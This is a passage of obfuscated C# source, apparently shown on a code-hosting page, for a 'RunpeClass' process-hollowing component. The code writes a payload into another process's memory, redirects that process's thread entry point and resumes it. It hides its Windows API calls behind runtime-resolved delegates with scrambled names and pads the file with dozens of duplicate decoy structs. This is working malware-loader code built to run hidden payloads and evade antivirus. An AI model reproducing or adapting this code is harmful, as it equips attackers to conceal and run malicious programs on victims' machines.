ref int local = ref num3;
int num20 = jx95Iq5(process7, address, buffer, size, out local) ? 1 : 0;
num2 = (long) num3;
}
}
byte[] bytes = BitConverter.GetBytes(num13);
RunpeClass.jx95Iq jx95Iq6 = jx95Iq1;
IntPtr process8 = info.Process;
int address3 = (int) ((long) context.Ebx + 8L);
byte[] buffer1 = bytes;
num3 = 0;
ref int local5 = ref num3;
int num21 = jx95Iq6(process8, address3, buffer1, 4, out local5) ? 1 : 0;
context.Eax = num13 + structure2.Optional.Address;
int num22 = mzt5Dq(info.Thread, ref context) ? 1 : 0;
int num23 = (int) g4Ch(info.Thread);
}
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr LoadLibraryA(string uj62Piq);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetProcAddress(IntPtr handle, string uj62Piq);
private static T Z8Wro8Mry4Fzhw<T>(string uj62Piq, string x7FVvcu1Ew)
{
if (uj62Piq == null)
throw new ArgumentNullException(nameof (uj62Piq));
return x7FVvcu1Ew != null ? (T) Marshal.GetDelegateForFunctionPointer(RunpeClass.GetProcAddress(RunpeClass.LoadLibraryA(uj62Piq), x7FVvcu1Ew), typeof (T)) : throw new ArgumentNullException(nameof (x7FVvcu1Ew));
}
public struct ACL
{
public byte AclRevision;
public byte Sbz1;
public short AclSize;
public short AceCount;
public short Sbz2;
}
public struct GENERIC_MAPPING
{
public int GenericRead;
public int GenericWrite;
public int GenericExecute;
public int GenericAll;
}
public struct SECURITY_DESCRIPTOR
{
public byte Revision;
public byte Sbz1;
public int Control;
public int Owner;
public int Group;
public RunpeClass.ACL Sacl;
public RunpeClass.ACL Dacl;
}
public struct POINTAPI
{
public int x;
public int y;
}
public struct ACL2
{
public byte AclRevision;
public byte Sbz1;
public short AclSize;
public short AceCount;
public short Sbz2;
}
public struct POINTAPI6
{
public int x;
public int y;
}
public struct ACL3
{
public byte AclRevision;
public byte Sbz1;
public short AclSize;
public short AceCount;
public short Sbz2;
}
public struct ACL5
{
public byte AclRevision;
public byte Sbz1;
public short AclSize;
public short AceCount;
public short Sbz2;
}
public struct LARGE_INTEGER
{
public int lowpart;
public int highpart;
}
public struct PALETTEENTRY
{
public byte peRed;
public byte peGreen;
public byte peBlue;
public byte peFlags;
}
public struct COORD
{
public short x;
public short y;
}
public struct EVENTLOGRECORD
{
public int Length;
public int Reserved;
public int RecordNumber;
public int TimeGenerated;
public int TimeWritten;
public int EventID;
public short EventStructure;
public short NumStrings;
public short EventCategory;
public short ReservedFlags;
public int ClosingRecordNumber;
public int StringOffset;
public int UserSidLength;
public int UserSidOffset;
public int DataLength;
public int DataOffset;
}
public struct RECT
{
public int Left;
public int Top;
public int Right;
public int Bottom;
}
public struct WAVEHDR
{
public string lpData;
public int dwBufferLength;
public int dwBytesRecorded;
public int dwUser;
public int dwFlags;
public int dwLoops;
public int lpNext;
public int Reserved;
}
public struct POINTAPI7
{
public int x;
public int y;
}
public struct CANDIDATEFORM
{
public int dwIndex;
public int dwStyle;
public RunpeClass.POINTAPI ptCurrentPos;
public RunpeClass.RECT rcArea;
}
public struct RECT3
{
public int Left;
public int Top;
public int Right;
public int Bottom;
}
public struct POINTAPI1
{
public int x;
public int y;
}
public struct COMPOSITIONFORM
{
public int dwStyle;
public RunpeClass.POINTAPI ptCurrentPos;
public RunpeClass.RECT rcArea;
}
public struct POINTAPI2
{
public int x;
public int y;
}
public struct MIDIHDR
{
public string lpData;
public int dwBufferLength;
public int dwBytesRecorded;
public int dwUser;
public int dwFlags;
public int lpNext;
public int Reserved;
}
public struct MIDIINCAPS
{
public short wMid;
public short wPid;
public int vDriverVersion;
public string szPname;
}
public struct MIXERCONTROLDETAILS
{
public int cbStruct;
public int dwControlID;
public int cChannels;
public int item;
public int cbDetails;
public int paDetails;
}
public struct MIXERCAPS
{
public short wMid;
public short wPid;
public int vDriverVersion;
public string szPname;
public int fdwSupport;
public int cDestinations;
}
public struct MIXERCONTROL
{
public int cbStruct;
public int dwControlID;
public int dwControlStructure;
public int fdwControl;
public int cMultipleItems;
public string szShortName;
public string szName;
public int[] Bounds;
public int[] Metrics;
}
public struct MIXERLINECONTROLS
{
public int cbStruct;
public int dwLineID;
public int dwControl;
public int cControls;
public int cbmxctrl;
public RunpeClass.MIXERCONTROL pamxctrl;
}
public struct Context
{
public uint Flags;
public uint D0;
public uint D1;
public uint D2;
public uint D3;
public uint D6;
public uint D7;
public RunpeClass.Save Save;
public uint SG;
public uint SF;
public uint SE;
public uint SD;
public uint Edi;
public uint Esi;
public uint Ebx;
public uint Edx;
public uint Ecx;
public uint Eax;
public uint Ebp;
public uint Eip;
public uint SC;
public uint EFlags;
public uint Esp;
public uint SS;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] Registers;
}
public struct Save
{
public uint Control;
public uint Status;
public uint Tag;
public uint ErrorO;
public uint ErrorS;
public uint DataO;
public uint DataS;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] RegisterArea;
public uint State;
}
public struct Misc
{
public uint Address;
public uint Size;
}
public struct SectionHeader
{
public byte uj62Piq;
public RunpeClass.Misc Misc;
public uint Address;
public uint Size;
public uint Pointer;
public uint PRelocations;
public uint PLines;
public uint NRelocations;
public uint NLines;
public uint Flags;
}
public struct ProcessInformation
{
public IntPtr Process;
public IntPtr Thread;
public int ProcessId;
public int ThreadId;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct StartupInformation
{
public int CB;
public string ReservedA;
public string Desktop;
public string Title;
public int X;
public int Y;
public int XSize;
public int YSize;
public int XCount;
public int YCount;
public int Fill;
public int Flags;
public short ShowWindow;
public short ReservedB;
public int ReservedC;
public int input;
public int Output;
public int Error;
}
public struct SecurityFlags
{
public int Length;
public IntPtr Descriptor;
public int Inherit;
}
public struct DosHeader
{
public ushort Magic;
public ushort Last;
public ushort Pages;
public ushort Relocations;
public ushort Size;
public ushort Minimum;
public ushort Maximum;
public ushort SS;
public ushort SP;
public ushort Checksum;
public ushort IP;
public ushort CS;
public ushort Table;
public ushort Overlay;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] ReservedA;
public ushort ID;
public ushort Info;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] ReservedB;
public int Address;
}
public struct NtHeaders
{
public uint Signature;
public RunpeClass.File_Header File;
public RunpeClass.Optional_Headers Optional;
}
public struct File_Header
{
public ushort Machine;
public ushort Sections;
public uint Stamp;
public uint Table;
public uint Symbols;
public ushort Size;
public ushort Flags;
}
public struct Optional_Headers
{
public ushort Magic;
public byte Major;
public byte Minor;
public uint SCode;
public uint IData;
public uint UData;
public uint Address;
public uint Code;
public uint Data;
public uint Image;
public uint SectionA;
public uint FileA;
public ushort MajorO;
public ushort MinorO;
public ushort MajorI;
public ushort MinorI;
public ushort MajorS;
public ushort MinorS;
public uint Version;
public uint SImage;
public uint SHeaders;
public uint Checksum;
public ushort Subsystem;
public ushort Flags;
public uint SSReserve;
public uint SSCommit;
public uint SHReserve;
public uint SHCommit;
public uint LFlags;
public uint Count;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public RunpeClass.zz_fn5tlr8gno8w7wc8j[] YZvBm2GrvaOfwbe9yyc;
}
public struct zz_fn5tlr8gno8w7wc8j
{
public uint Address;
public uint Size;
}
public delegate bool mrqs(
string uj62Piq,
string command,
ref RunpeClass.SecurityFlags process,
ref RunpeClass.SecurityFlags thread,
bool inherit,
uint flags,
IntPtr system,
string current,
[In] ref RunpeClass.StartupInformation startup,
out RunpeClass.ProcessInformation info);
public delegate bool jx95Iq(
IntPtr process,
int address,
byte[] buffer,
int size,
out int written);
public delegate int i5Ondq(
IntPtr process,
int address,
ref int buffer,
int size,
ref int read);
public delegate IntPtr qh4E(
IntPtr process,
int address,
uint size,
uint type,
uint protect);
public delegate long enx2Ma(IntPtr process, int address);
public delegate uint g4Ch(IntPtr thread);
public delegate bool evzew(IntPtr thread, ref RunpeClass.Context context);
public delegate bool mzt5Dq(IntPtr thread, ref RunpeClass.Context context);
}
}
Reference in New Issue Copy Permalink